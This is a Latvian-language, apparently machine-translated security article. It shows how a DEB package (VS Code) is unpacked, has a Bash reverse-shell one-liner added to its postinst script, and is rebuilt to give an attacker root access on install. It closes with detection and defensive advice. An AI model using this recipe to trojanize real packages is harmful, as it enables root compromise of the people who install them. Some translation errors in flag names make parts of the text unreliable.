Vai zinājāt, ka uzbrucēji var modificēt DEB failā iesaiņotos skriptus, lai iegūtu nesankcionētu piekļuvi jūsu datoram? Lūk, kā tiek nodrošinātas DEB pakotnes aizmugures durvis.

Key Takeaways

  • DEB pakotnēm var viegli izveidot aizmugures durvis, ļaujot uzbrucējiem ievadīt jūsu sistēmā ļaunprātīgu kodu, kad tās instalējat ar root atļaujām.
  • Inficētās DEB pakotnes ir grūti noteikt, jo tās var neatzīmēt pretvīrusu programmatūra vai mākoņrisinājumi, piemēram, VirusTotal.
  • Lai pasargātu sevi, izvairieties no DEB pakotņu lejupielādes no nejaušām vietnēm, pieturieties pie oficiālajām lejupielādes vietnēm vai kopienai uzticamas vietnes un apsveriet iespēju instalēt drošības rīkus, lai aizsargātu savu Linux sistēmu pret tīklu uzbrukumiem.

DEB faili ir programmatūras pakotnes, kas ir galvenais programmatūras piegādes formāts uz Debian balstītiem Linux izplatījumiem.

Lai instalētu DEB pakotnes, jums ir jāizmanto pakotņu pārvaldnieks, piemēram, dpkg ar root atļaujām. Uzbrucēji izmanto šo iespēju un ievada šajās paketēs aizmugures durvis. Instalējot tos ar dpkg vai jebkuru citu pakotņu pārvaldnieku, vienlaikus tiek izpildīts arī ļaunprātīgais kods un tas apdraud jūsu sistēmu.

instagram viewer

Izpētīsim, kā tieši DEB pakotnēm ir aizmugures durvis un ko jūs varat darīt, lai sevi aizsargātu.

Kā tiek nodrošinātas DEB paketes aizmugures durvis?

Pirms jūs saprotat, kā DEB pakotnes ir aizmugures durvis, izpētīsim, kas atrodas DEB pakotnē. Demonstrēšanai es lejupielādēšu Microsoft Visual Studio Code DEB pakotni no oficiālās Microsoft vietnes. Šī ir tā pati pakotne, kuru lejupielādējat, ja vēlaties instalēt VS Code operētājsistēmā Linux.

Lejupielādēt:Visual Studio kods

Tagad, kad mērķa pakotne ir lejupielādēta, ir pienācis laiks to izpakot. Varat izsaiņot DEB pakotni, izmantojot dpkg-deb komandu ar -R karodziņu, kam seko ceļš uz satura glabāšanu:

dpkg-deb -R

Tam vajadzētu izvilkt VS koda pakotnes saturu.

Pārejot uz mapi, jūs atradīsit vairākus direktorijus, taču mūsu interese ir tikai par DEBIANS direktoriju. Šajā direktorijā ir uzturētāja skripti, kas tiek izpildīti instalēšanas laikā ar root tiesībām. Kā jūs, iespējams, jau esat sapratuši, uzbrucēji modificē skriptus šajā direktorijā.

Demonstrēšanai es modificēšu postinst skriptu un pievienojiet vienkāršu Bash reverso TCP apvalku. Kā norāda nosaukums, tas ir skripts, kas tiek izpildīts pēc pakotnes instalēšanas sistēmā.

Tajā ir komandas, kas pabeidz konfigurācijas, piemēram, simbolisku saišu iestatīšanu, atkarību apstrādi un daudz ko citu. Internetā varat atrast daudz dažādu reverso apvalku. Lielākā daļa no tiem darbosies tāpat. Šeit ir reversā apvalka viena čaula paraugs:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

Komandas skaidrojums:

  • bash: Šī ir komanda, kas izsauc Bash apvalku.
  • -es: Karogs liek Bash darboties interaktīvajā režīmā, ļaujot reāllaika komandu I/O.
  • >& /dev/tcp/ip/port: Tas novirza standarta izvade un standarta kļūda uz tīkla ligzdu, būtībā izveidojot TCP savienojumu ar un .
  • 0>&1: Tas novirza ievadi un izvadi uz vienu un to pašu vietu, t.i., uz tīkla ligzdu.

Nezinātājiem reversais apvalks ir koda veids, kas, izpildot mērķa iekārtā, uzsāk savienojumu ar uzbrucēja iekārtu. Reversie apvalki ir lielisks veids, kā apiet ugunsmūra ierobežojumus, jo trafiku ģenerē mašīna, kas atrodas aiz ugunsmūra.

Lūk, kā izskatās modificētais skripts:

Kā redzat, viss ir vienāds, bet ir pievienota tikai viena rinda, t.i., mūsu Bash reversais apvalks. Tagad faili ir jāveido atpakaļ mapē ".deb" formātā. Vienkārši izmantojiet dpkg komandu ar --būvēt karogu vai izmantošanu dpkg-deb Ar -b karodziņš, kam seko izvilktā satura ceļš:

dpkg --build 
dpkg-deb -b

Tagad DEB pakotne ar aizmugures durvīm ir gatava sūtīšanai uz ļaunprātīgām vietnēm. Simulēsim scenāriju, kurā upuris ir lejupielādējis DEB pakotni savā sistēmā un instalē to kā jebkuru citu parasto pakotni.

Augšējā termināļa rūts ir paredzēta upura POV, bet apakšējā ir uzbrucēja POV. Upuris instalē pakotni ar sudo dpkg -i un uzbrucējs pacietīgi klausās ienākošos savienojumus, izmantojot netcat komanda Linux.

Tiklīdz instalēšana ir pabeigta, ievērojiet, ka uzbrucējs iegūst reverso čaulas savienojumu un tagad viņam ir root piekļuve upura sistēmai. Tagad jūs zināt, kā DEB pakotnēm ir aizmugures durvis. Tagad uzzināsim, kā jūs varat sevi pasargāt.

Kā noteikt, vai DEB pakotne ir ļaunprātīga

Tagad, kad jūs zināt, ka inficētās DEB pakotnes ir lieta, jums noteikti jādomā, kā atrast inficētās. Iesācējiem varat mēģināt izmantot a Linux pretvīrusu programmatūra piemēram, ClamAV. Diemžēl, kad pakotnē tika veikta ClamAV skenēšana, tā netika atzīmēta kā ļaunprātīga. Lūk, skenēšanas rezultāts:

Tātad, ja vien jums nav izveidots premium klases pretvīrusu risinājums (kas negarantē, ka netiksit uzlauzts), ir diezgan grūti atklāt ļaunprātīgas DEB pakotnes. Mēģināsim izmantot mākoņa risinājumu, piemēram, vietni VirusTotal:

Kā redzat, VirusTotal tajā neko sliktu neatklāja. Vienīgais veids, kā pasargāt sevi no šādiem draudiem, ir ievērot pamata drošības higiēnu, piemēram, vienmēr nelejupielādēt failus no nezināmiem avotiem. pārbaudot faila jaucējkodu, un kopumā izvairoties no ēnas programmatūras instalēšanas.

Internets ir pilns ar šādiem draudiem. Vienīgais veids, kā sērfot, nezaudējot datus, ir pārzināt sevi un pārlūkot uzticamas vietnes. Turklāt operētājsistēmā Linux jums vajadzētu arī mēģināt atrast, vai programmatūrai, kuru lejupielādējat, ir AppImage variants jo tie ir autonomi un var tikt ievietoti smilšu kastē, un tādējādi tie nav kontaktā ar jūsu sistēmu.

Nelejupielādējiet DEB pakotnes no nejaušām vietnēm!

DEB pakotnes pēc savas būtības nav sliktas, tomēr uzbrucēji var viegli ieroci un nosūtīt tos nenojaušajiem lietotājiem. Kā parādīts, DEB pakotni var viegli atvērt un modificēt, lai pievienotu pielāgotu kodu tikai ar dažām komandām, padarot to par izplatītu ļaunprātīgas programmatūras pārsūtīšanas vektoru.

Pat vienkāršas aizmugures durvis DEB pakotnēs netiek uztvertas labākajiem pretvīrusu risinājumiem. Tāpēc vislabāk ir spēlēt droši, izmantot veselo saprātu, sērfojot tīmeklī, un vienmēr lejupielādēt programmatūru tikai no oficiālajām lejupielādes vietnēm vai kopienas uzticamām vietnēm.

Tagad, kad esat informēts par drošības riskiem, kas rodas, instalējot DEB pakotnes no jaunām vai nezināmām vietnēm, jums jābūt piesardzīgam, instalējot jaunu programmatūru. Tomēr nepietiek tikai ar to, ko instalējat. Jūsu Linux sistēma var būt arī tīkla uzbrukumu mērķis.

Lai nodrošinātu savu drošību tīkla uzbrukuma gadījumā, ieteicams instalēt tīkla drošības rīkus.